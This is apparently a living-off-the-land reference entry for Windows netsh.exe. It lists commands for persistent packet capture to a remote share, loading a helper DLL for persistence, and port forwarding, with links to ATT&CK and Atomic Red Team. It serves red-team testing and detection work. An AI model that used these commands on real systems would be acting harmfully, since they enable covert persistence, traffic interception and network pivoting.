720 B
720 B
Netsh.exe
- Functions: Execute, Surveillance
netsh trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl
netsh trace show status
netsh.exe add helper C:\Path\file.dll
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
Acknowledgements: *
Code sample: *
Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
- https://attack.mitre.org/wiki/Technique/T1128
- https://twitter.com/teemuluotio/status/990532938952527873
Full path:
c:\windows\system32\netsh.exe
c:\windows\sysWOW64\netsh.exe
Notes:
Detection: